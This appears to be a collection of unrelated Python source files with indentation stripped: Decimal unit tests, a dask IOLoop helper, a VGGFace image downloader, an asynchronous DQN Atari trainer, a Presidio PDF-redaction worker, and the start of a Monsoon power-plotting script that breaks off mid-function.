oplist.append(('/', '__truediv__', '__rtruediv__'))
for sym, lop, rop in oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
class DecimalArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
# The following are two functions used to test threading in the next class
def thfunc1(cls):
d1 = Decimal(1)
d3 = Decimal(3)
cls.assertEqual(d1/d3, Decimal('0.333333333'))
cls.synchro.wait()
cls.assertEqual(d1/d3, Decimal('0.333333333'))
cls.finish1.set()
return
def thfunc2(cls):
d1 = Decimal(1)
d3 = Decimal(3)
cls.assertEqual(d1/d3, Decimal('0.333333333'))
thiscontext = getcontext()
thiscontext.prec = 18
cls.assertEqual(d1/d3, Decimal('0.333333333333333333'))
cls.synchro.set()
cls.finish2.set()
return
class DecimalUseOfContextTest(unittest.TestCase):
'''Unit tests for Use of Context cases in Decimal.'''
try:
import threading
except ImportError:
threading = None
    # Take care when executing this test from IDLE: there's an issue in threading
    # that hangs IDLE and I couldn't find it.
def test_threading(self):
#Test the "threading isolation" of a Context.
self.synchro = threading.Event()
self.finish1 = threading.Event()
self.finish2 = threading.Event()
th1 = threading.Thread(target=thfunc1, args=(self,))
th2 = threading.Thread(target=thfunc2, args=(self,))
th1.start()
th2.start()
self.finish1.wait()
        self.finish2.wait()
return
if threading is None:
del test_threading
class DecimalUsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.failUnless(dc > da)
self.failUnless(dc >= da)
self.failUnless(da < dc)
self.failUnless(da <= dc)
self.failUnless(da == db)
self.failUnless(da != dc)
self.failUnless(da <= db)
self.failUnless(da >= db)
self.assertEqual(cmp(dc,da), 1)
self.assertEqual(cmp(da,dc), -1)
self.assertEqual(cmp(da,db), 0)
#a Decimal and an int
self.failUnless(dc > 23)
self.failUnless(23 < dc)
self.failUnless(dc == 45)
self.assertEqual(cmp(dc,23), 1)
self.assertEqual(cmp(23,dc), -1)
self.assertEqual(cmp(dc,45), 0)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = map(Decimal, xrange(100))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_copy_and_deepcopy_methods(self):
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
#just that it's hashable
hash(Decimal(23))
        #the same hash as the equivalent int
self.assertEqual(hash(Decimal(23)), hash(23))
self.assertRaises(TypeError, hash, Decimal('NaN'))
self.assert_(hash(Decimal('Inf')))
self.assert_(hash(Decimal('-Inf')))
def test_min_and_max_methods(self):
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.failUnless(min(d1,d2) is d1)
self.failUnless(min(d2,d1) is d1)
self.failUnless(max(d1,d2) is d2)
self.failUnless(max(d2,d1) is d2)
#between Decimal and long
self.failUnless(min(d1,l2) is d1)
self.failUnless(min(l2,d1) is d1)
self.failUnless(max(l1,d2) is d2)
self.failUnless(max(d2,l1) is d2)
def test_as_nonzero(self):
#as false
self.failIf(Decimal(0))
#as true
self.failUnless(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), 'Decimal("15.32")') # repr
def test_tonum_methods(self):
#Test float, int and long methods.
d1 = Decimal('66')
d2 = Decimal('15.32')
#int
self.assertEqual(int(d1), 66)
self.assertEqual(int(d2), 15)
#long
self.assertEqual(long(d1), 66)
self.assertEqual(long(d2), 15)
#float
self.assertEqual(float(d1), 66)
self.assertEqual(float(d2), 15.32)
def test_eval_round_trip(self):
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
#with zero
d = Decimal(0)
self.assertEqual(d.as_tuple(), (0, (0,), 0) )
#int
d = Decimal(-45)
self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )
#complicated string
d = Decimal("-4.34913534E-17")
self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
#inf
d = Decimal("Infinity")
self.assertEqual(d.as_tuple(), (0, (0,), 'F') )
def test_immutability_operations(self):
        # Do operations and check that they didn't change the internal objects.
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e-33')
b2 = Decimal('33e-33')
def checkSameDec(operation, useOther=False):
if useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
else:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
return
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", True)
checkSameDec("__div__", True)
checkSameDec("__divmod__", True)
checkSameDec("__cmp__", True)
checkSameDec("__float__")
checkSameDec("__floordiv__", True)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__long__")
checkSameDec("__mod__", True)
checkSameDec("__mul__", True)
checkSameDec("__neg__")
checkSameDec("__nonzero__")
checkSameDec("__pos__")
checkSameDec("__pow__", True)
checkSameDec("__radd__", True)
checkSameDec("__rdiv__", True)
checkSameDec("__rdivmod__", True)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", True)
checkSameDec("__rmod__", True)
checkSameDec("__rmul__", True)
checkSameDec("__rpow__", True)
checkSameDec("__rsub__", True)
checkSameDec("__str__")
checkSameDec("__sub__", True)
checkSameDec("__truediv__", True)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", True)
checkSameDec("max", True)
checkSameDec("min", True)
checkSameDec("normalize")
checkSameDec("quantize", True)
checkSameDec("remainder_near", True)
checkSameDec("same_quantum", True)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
class DecimalPythonAPItests(unittest.TestCase):
def test_pickle(self):
d = Decimal('-3.141590000')
p = pickle.dumps(d)
e = pickle.loads(p)
self.assertEqual(d, e)
def test_int(self):
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
class ContextAPItests(unittest.TestCase):
def test_pickle(self):
c = Context()
e = pickle.loads(pickle.dumps(c))
for k in vars(c):
v1 = vars(c)[k]
v2 = vars(e)[k]
self.assertEqual(v1, v2)
def test_equality_with_other_types(self):
self.assert_(Decimal(10) in ['a', 1.0, Decimal(10), (1,2), {}])
self.assert_(Decimal(10) not in ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
class WithStatementTest(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assert_(orig_ctx is final_ctx, 'did not restore context correctly')
self.assert_(orig_ctx is not set_ctx, 'did not copy the context')
self.assert_(set_ctx is enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assert_(orig_ctx is final_ctx, 'did not restore context correctly')
self.assert_(set_ctx.prec == new_ctx.prec, 'did not set correct context')
self.assert_(new_ctx is not set_ctx, 'did not copy the context')
self.assert_(set_ctx is enter_ctx, '__enter__ returned wrong context')
def test_main(arith=False, verbose=None):
""" Execute the tests.
Runs all arithmetic tests if arith is True or if the "decimal" resource
is enabled in regrtest.py
"""
init()
global TEST_ALL
TEST_ALL = arith or is_resource_enabled('decimal')
test_classes = [
DecimalExplicitConstructionTest,
DecimalImplicitConstructionTest,
DecimalArithmeticOperatorsTest,
DecimalUseOfContextTest,
DecimalUsabilityTest,
DecimalPythonAPItests,
ContextAPItests,
DecimalTest,
WithStatementTest,
]
try:
run_unittest(*test_classes)
import decimal as DecimalModule
run_doctest(DecimalModule, verbose)
finally:
setcontext(ORIGINAL_CONTEXT)
if __name__ == '__main__':
# Calling with no arguments runs all tests.
# Calling with "Skip" will skip over 90% of the arithmetic tests.
if len(sys.argv) == 1:
test_main(arith=True, verbose=True)
elif len(sys.argv) == 2:
arith = sys.argv[1].lower() != 'skip'
test_main(arith=arith, verbose=True)
else:
raise ValueError("test called with wrong arguments, use test_Decimal [Skip]")
|
dask_io_loop.py | import distributed
from tornado.ioloop import IOLoop
from threading import Thread
from distributed import Scheduler, Worker, Executor
import logging
import atexit
distributed.core.logging.propagate = False
__ioloop__ = IOLoop()
class DaskLoop():
def __init__(self):
self.loop = __ioloop__
self.t = Thread(target=self.loop.start)
self.t.start()
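# A hypothetical usage sketch (the distributed calls shown are assumptions, not
# part of this file): start the shared IOLoop thread, then hand its loop to the
# distributed components, e.g.
#   loop = DaskLoop()
#   scheduler = Scheduler(loop=loop.loop)
# Note that the loop thread is not daemonic, so the process will not exit until
# the IOLoop is stopped (presumably why the atexit hook below was sketched out).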
#def close_ioloop():
# print "closing..."
# __ioloop__.close()
#atexit.register(close_ioloop)
#print "registering.."
|
download_vggface_dataset.py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import sys
import os
import threading
import socket
import urllib.request
timeout = 1
socket.setdefaulttimeout(timeout)
save_path = '/media/taotao/2T/vgg_face_dataset/'
def download_and_save(url, savename):
try:
data = urllib.request.urlopen(url).read()
fid = open(savename, 'w+b')
fid.write(data)
print("download succeed: " + url)
fid.close()
except IOError:
print("download failed: " + url)
def get_all_image(filename):
fid = open(filename)
name = filename.split('/')[-1]
name = name[:-4]
lines = fid.readlines()
fid.close()
for line in lines:
line_split = line.split(' ')
image_id = line_split[0]
image_url = line_split[1]
if not os.path.exists(f'{save_path}/' + name):
os.mkdir(f'{save_path}/' + name)
savefile = f'{save_path}/' + name + '/' + image_id + '.jpg'
        # Cap the number of concurrent download threads at 1000.
print(image_url, savefile)
while True:
if (len(threading.enumerate()) < 1000):
break
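        # A gentler throttle would sleep instead of busy-spinning, e.g. (sketch;
        # this would also need "import time" at the top of the file):
        #   while len(threading.enumerate()) >= 1000:
        #       time.sleep(0.05)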
t = threading.Thread(target=download_and_save, args=(image_url, savefile,))
t.start()
if __name__ == "__main__":
fileDir = '/home/taotao/Downloads/vgg_face_dataset/files/'
names = os.listdir(fileDir)
for i in range(len(names)):
        get_all_image(os.path.join(fileDir, names[i]))
|
async_dqn.py | #!/usr/bin/env python
import os
os.environ["KERAS_BACKEND"] = "tensorflow"
from skimage.transform import resize
from skimage.color import rgb2gray
from atari_environment import AtariEnvironment
import threading
import tensorflow as tf
import sys
import random
import numpy as np
import time
import gym
from keras import backend as K
from model import build_network
flags = tf.app.flags
flags.DEFINE_string('experiment', 'dqn_breakout', 'Name of the current experiment')
flags.DEFINE_string('game', 'Breakout-v0', 'Name of the atari game to play. Full list here: https://gym.openai.com/envs#atari')
flags.DEFINE_integer('num_concurrent', 8, 'Number of concurrent actor-learner threads to use during training.')
flags.DEFINE_integer('tmax', 80000000, 'Number of training timesteps.')
flags.DEFINE_integer('resized_width', 84, 'Scale screen to this width.')
flags.DEFINE_integer('resized_height', 84, 'Scale screen to this height.')
flags.DEFINE_integer('agent_history_length', 4, 'Use this number of recent screens as the environment state.')
flags.DEFINE_integer('network_update_frequency', 32, 'Frequency with which each actor learner thread does an async gradient update')
flags.DEFINE_integer('target_network_update_frequency', 10000, 'Reset the target network every n timesteps')
flags.DEFINE_float('learning_rate', 0.0001, 'Initial learning rate.')
flags.DEFINE_float('gamma', 0.99, 'Reward discount rate.')
flags.DEFINE_integer('anneal_epsilon_timesteps', 1000000, 'Number of timesteps to anneal epsilon.')
flags.DEFINE_string('summary_dir', '/tmp/summaries', 'Directory for storing tensorboard summaries')
flags.DEFINE_string('checkpoint_dir', '/tmp/checkpoints', 'Directory for storing model checkpoints')
flags.DEFINE_integer('summary_interval', 5,
                     'Save training summary to file every n seconds (rounded '
                     'up to statistics interval).')
flags.DEFINE_integer('checkpoint_interval', 600,
'Checkpoint the model (i.e. save the parameters) every n '
'seconds (rounded up to statistics interval).')
flags.DEFINE_boolean('show_training', True, 'If true, have gym render environments during training')
flags.DEFINE_boolean('testing', False, 'If true, run gym evaluation')
flags.DEFINE_string('checkpoint_path', 'path/to/recent.ckpt', 'Path to recent checkpoint to use for evaluation')
flags.DEFINE_string('eval_dir', '/tmp/', 'Directory to store gym evaluation')
flags.DEFINE_integer('num_eval_episodes', 100, 'Number of episodes to run gym evaluation.')
FLAGS = flags.FLAGS
T = 0
TMAX = FLAGS.tmax
def sample_final_epsilon():
"""
Sample a final epsilon value to anneal towards from a distribution.
These values are specified in section 5.1 of http://arxiv.org/pdf/1602.01783v1.pdf
"""
final_epsilons = np.array([.1,.01,.5])
probabilities = np.array([0.4,0.3,0.3])
return np.random.choice(final_epsilons, 1, p=list(probabilities))[0]
def actor_learner_thread(thread_id, env, session, graph_ops, num_actions, summary_ops, saver):
"""
Actor-learner thread implementing asynchronous one-step Q-learning, as specified
in algorithm 1 here: http://arxiv.org/pdf/1602.01783v1.pdf.
"""
global TMAX, T
# Unpack graph ops
s = graph_ops["s"]
q_values = graph_ops["q_values"]
st = graph_ops["st"]
target_q_values = graph_ops["target_q_values"]
reset_target_network_params = graph_ops["reset_target_network_params"]
a = graph_ops["a"]
y = graph_ops["y"]
grad_update = graph_ops["grad_update"]
summary_placeholders, update_ops, summary_op = summary_ops
# Wrap env with AtariEnvironment helper class
env = AtariEnvironment(gym_env=env, resized_width=FLAGS.resized_width, resized_height=FLAGS.resized_height, agent_history_length=FLAGS.agent_history_length)
# Initialize network gradients
s_batch = []
a_batch = []
y_batch = []
final_epsilon = sample_final_epsilon()
initial_epsilon = 1.0
epsilon = 1.0
print "Starting thread ", thread_id, "with final epsilon ", final_epsilon
time.sleep(3*thread_id)
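# Stagger thread start-up so the actor-learners come online a few seconds apart.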
t = 0
while T < TMAX:
# Get initial game observation
s_t = env.get_initial_state()
terminal = False
# Set up per-episode counters
ep_reward = 0
episode_ave_max_q = 0
ep_t = 0
while True:
# Forward the deep q network, get Q(s,a) values
readout_t = q_values.eval(session = session, feed_dict = {s : [s_t]})
# Choose next action based on e-greedy policy
a_t = np.zeros([num_actions])
action_index = 0
if random.random() <= epsilon:
action_index = random.randrange(num_actions)
else:
action_index = np.argmax(readout_t)
a_t[action_index] = 1
# Scale down epsilon
if epsilon > final_epsilon:
epsilon -= (initial_epsilon - final_epsilon) / FLAGS.anneal_epsilon_timesteps
# Gym executes the action in the game environment on behalf of the actor-learner
s_t1, r_t, terminal, info = env.step(action_index)
# Accumulate gradients
readout_j1 = target_q_values.eval(session = session, feed_dict = {st : [s_t1]})
clipped_r_t = np.clip(r_t, -1, 1)
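# One-step Q-learning target: y = r for terminal transitions, else y = r + gamma * max_a' Q_target(s', a').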
if terminal:
y_batch.append(clipped_r_t)
else:
y_batch.append(clipped_r_t + FLAGS.gamma * np.max(readout_j1))
a_batch.append(a_t)
s_batch.append(s_t)
# Update the state and counters
s_t = s_t1
T += 1
t += 1
ep_t += 1
ep_reward += r_t
episode_ave_max_q += np.max(readout_t)
# Optionally update target network
if T % FLAGS.target_network_update_frequency == 0:
session.run(reset_target_network_params)
# Optionally update online network
if t % FLAGS.network_update_frequency == 0 or terminal:
if s_batch:
session.run(grad_update, feed_dict = {y : y_batch,
a : a_batch,
s : s_batch})
# Clear gradients
s_batch = []
a_batch = []
y_batch = []
# Save model progress
if t % FLAGS.checkpoint_interval == 0:
saver.save(session, FLAGS.checkpoint_dir+"/"+FLAGS.experiment+".ckpt", global_step = t)
# Print end of episode stats
if terminal:
stats = [ep_reward, episode_ave_max_q/float(ep_t), epsilon]
for i in range(len(stats)):
session.run(update_ops[i], feed_dict={summary_placeholders[i]:float(stats[i])})
print "THREAD:", thread_id, "/ TIME", T, "/ TIMESTEP", t, "/ EPSILON", epsilon, "/ REWARD", ep_reward, "/ Q_MAX %.4f" % (episode_ave_max_q/float(ep_t)), "/ EPSILON PROGRESS", t/float(FLAGS.anneal_epsilon_timesteps)
break
def build_graph(num_actions):
# Create shared deep q network
s, q_network = build_network(num_actions=num_actions, agent_history_length=FLAGS.agent_history_length, resized_width=FLAGS.resized_width, resized_height=FLAGS.resized_height)
network_params = q_network.trainable_weights
q_values = q_network(s)
# Create shared target network
st, target_q_network = build_network(num_actions=num_actions, agent_history_length=FLAGS.agent_history_length, resized_width=FLAGS.resized_width, resized_height=FLAGS.resized_height)
target_network_params = target_q_network.trainable_weights
target_q_values = target_q_network(st)
# Op for periodically updating target network with online network weights
reset_target_network_params = [target_network_params[i].assign(network_params[i]) for i in range(len(target_network_params))]
# Define cost and gradient update op
a = tf.placeholder("float", [None, num_actions])
y = tf.placeholder("float", [None])
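# Masking the Q-value vector with the one-hot action leaves only Q(s, a_taken), which feeds the squared TD error below.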
action_q_values = tf.reduce_sum(q_values * a, reduction_indices=1)
cost = tf.reduce_mean(tf.square(y - action_q_values))
optimizer = tf.train.AdamOptimizer(FLAGS.learning_rate)
grad_update = optimizer.minimize(cost, var_list=network_params)
graph_ops = {"s" : s,
"q_values" : q_values,
"st" : st,
"target_q_values" : target_q_values,
"reset_target_network_params" : reset_target_network_params,
"a" : a,
"y" : y,
"grad_update" : grad_update}
return graph_ops
# Set up some episode summary ops to visualize on tensorboard.
def setup_summaries():
episode_reward = tf.Variable(0.)
tf.scalar_summary("Episode Reward", episode_reward)
episode_ave_max_q = tf.Variable(0.)
tf.scalar_summary("Max Q Value", episode_ave_max_q)
logged_epsilon = tf.Variable(0.)
tf.scalar_summary("Epsilon", logged_epsilon)
logged_T = tf.Variable(0.)
summary_vars = [episode_reward, episode_ave_max_q, logged_epsilon]
summary_placeholders = [tf.placeholder("float") for i in range(len(summary_vars))]
update_ops = [summary_vars[i].assign(summary_placeholders[i]) for i in range(len(summary_vars))]
summary_op = tf.merge_all_summaries()
return summary_placeholders, update_ops, summary_op
def get_num_actions():
"""
Returns the number of possible actions for the given atari game
"""
# Figure out number of actions from gym env
env = gym.make(FLAGS.game)
num_actions = env.action_space.n
if (FLAGS.game == "Pong-v0" or FLAGS.game == "Breakout-v0"):
# Gym currently specifies 6 actions for pong
# and breakout when only 3 are needed. This
# is a lame workaround.
num_actions = 3
return num_actions
def train(session, graph_ops, num_actions, saver):
# Initialize target network weights
session.run(graph_ops["reset_target_network_params"])
# Set up game environments (one per thread)
envs = [gym.make(FLAGS.game) for i in range(FLAGS.num_concurrent)]
summary_ops = setup_summaries()
summary_op = summary_ops[-1]
# Initialize variables
session.run(tf.initialize_all_variables())
summary_save_path = FLAGS.summary_dir + "/" + FLAGS.experiment
writer = tf.train.SummaryWriter(summary_save_path, session.graph)
if not os.path.exists(FLAGS.checkpoint_dir):
os.makedirs(FLAGS.checkpoint_dir)
# Start num_concurrent actor-learner training threads
actor_learner_threads = [threading.Thread(target=actor_learner_thread, args=(thread_id, envs[thread_id], session, graph_ops, num_actions, summary_ops, saver)) for thread_id in range(FLAGS.num_concurrent)]
for t in actor_learner_threads:
t.start()
# Show the agents training and write summary statistics
last_summary_time = 0
while True:
if FLAGS.show_training:
for env in envs:
env.render()
now = time.time()
if now - last_summary_time > FLAGS.summary_interval:
summary_str = session.run(summary_op)
writer.add_summary(summary_str, float(T))
last_summary_time = now
for t in actor_learner_threads:
t.join()
def evaluation(session, graph_ops, saver):
saver.restore(session, FLAGS.checkpoint_path)
print "Restored model weights from ", FLAGS.checkpoint_path
monitor_env = gym.make(FLAGS.game)
monitor_env.monitor.start(FLAGS.eval_dir+"/"+FLAGS.experiment+"/eval")
# Unpack graph ops
s = graph_ops["s"]
q_values = graph_ops["q_values"]
# Wrap env with AtariEnvironment helper class
env = AtariEnvironment(gym_env=monitor_env, resized_width=FLAGS.resized_width, resized_height=FLAGS.resized_height, agent_history_length=FLAGS.agent_history_length)
for i_episode in xrange(FLAGS.num_eval_episodes):
s_t = env.get_initial_state()
ep_reward = 0
terminal = False
while not terminal:
monitor_env.render()
readout_t = q_values.eval(session = session, feed_dict = {s : [s_t]})
action_index = np.argmax(readout_t)
s_t1, r_t, terminal, info = env.step(action_index)
s_t = s_t1
ep_reward += r_t
print ep_reward
monitor_env.monitor.close()
def main(_):
g = tf.Graph()
with g.as_default(), tf.Session() as session:
K.set_session(session)
num_actions = get_num_actions()
graph_ops = build_graph(num_actions)
saver = tf.train.Saver()
if FLAGS.testing:
evaluation(session, graph_ops, saver)
else:
train(session, graph_ops, num_actions, saver)
if __name__ == "__main__":
tf.app.run()
|
work_pdf_strategy.py | from urllib.request import urlopen
from work_strategies.work_base_strategy import WorkerBaseStrategy
from pdf2image import convert_from_path, convert_from_bytes
from presidio_image_redactor import ImageRedactorEngine
from threading import Lock,Thread, Semaphore
from PIL import Image, ImageChops
from presidio_image_redactor.image_analyzer_engine import ImageAnalyzerEngine
class WorkerPDFStrategy(WorkerBaseStrategy):
hyperthread_image_processing = True
## if we wanted to limit this across classes we could change this to active and remove it from the constructor
# thread_semaphore = Semaphore(5)
def __init__(self,domain, task_type):
super().__init__(domain, task_type)
self.my_lock = Lock()
self.image_analyzer = ImageAnalyzerEngine()
self.text_redactor = ImageRedactorEngine()
self.thread_semaphore = None
def _fetch(self, task):
try:
if task.in_is_local:
task.data = convert_from_path(task.in_endpoint)
else:
data = urlopen(task.in_endpoint).read()
task.data = convert_from_bytes(data)
except Exception:
print(f'Error reading pdf from source: {task.in_endpoint}')
return task
def _process(self, task):
redacted_images = {}
local_threads = []
pdf_img_list = []
# self.thread_semaphore = Semaphore(task.config['max_thread_per_task']+1)
# print(task.config['max_thread_per_task'])
# In case we have a large doc, don't spin up too many threads
for pos,image in enumerate(task.data):
# self.thread_semaphore.acquire()
thread = Thread(target=self._redact_an_image, args=(image,pos,redacted_images,task))
local_threads.append(thread)
for thread in local_threads:
thread.start()
# wait for the threads to finish
for thread in local_threads:
thread.join()
# reassemble the doc in proper order
for num, page in sorted(redacted_images.items()):
pdf_img_list.append(page)
task.data = pdf_img_list
return task
def _push(self, worker, task):
print(f"Worker {worker.id} pushed task at {task.in_endpoint}")
worker.write_queue.put(task)
def _redact_an_image(self,img,key,output,task):
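# The lock serializes the whole analyze/redact step; the shared engine instances are presumably not thread-safe.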
self.my_lock.acquire()
try:
temp = ImageChops.duplicate(img)
image_result = self.image_analyzer.analyze(temp)
if len(image_result) > 0:
task.profile["page"+str(key)] = str(image_result)
output[key] = self.text_redactor.redact(img, self.REDACT_COLOR)
except Exception:
print(f"Incompatible PDF type occurred on page {key+1} in the doc located at {task.in_endpoint}... ignoring this page")
finally:
self.my_lock.release()
# self.thread_semaphore.release()
|
plot_realtime_power.py | #!/usr/bin/env python
import Monsoon.LVPM as LVPM
import Monsoon.HVPM as HVPM
from Monsoon import sampleEngine
import argparse
import csv
import os
import matplotlib
matplotlib.use('TKAgg')
from matplotlib import pyplot as plt
import matplotlib.animation as animation
import threading
import collections
import signal
import sys
fig, ax = plt.subplots()
plt.ylabel('amperage (mA)')
plt.xlabel('time sequences')
plt.ylim((0, 2000))
display_range = 50000
samples_queue = collections.deque(maxlen=display_range)
time_queue = collections.deque(maxlen=display_range)
time_queue.extend([0 for _ in range(display_range)])
samples_queue.extend([0 for _ in range(display_range)])
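# Pre-filling both deques with zeros keeps the x and y arrays equal-length before real samples arrive.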
line, = ax.plot(time_queue, samples_queue, linewidth=0.5)
should_pause = False
csv_file_handle = None
csv_writer = None
trigger_count = 0
trigger = float("inf")
triggered = False
header = ["Time(ms)", "Main(mA)", "Main Voltage(V)"]
def animate(_):
if should_pause:
return line,
# print("samples: {}".format(latest_current_values))
line.set_xdata(time_queue)
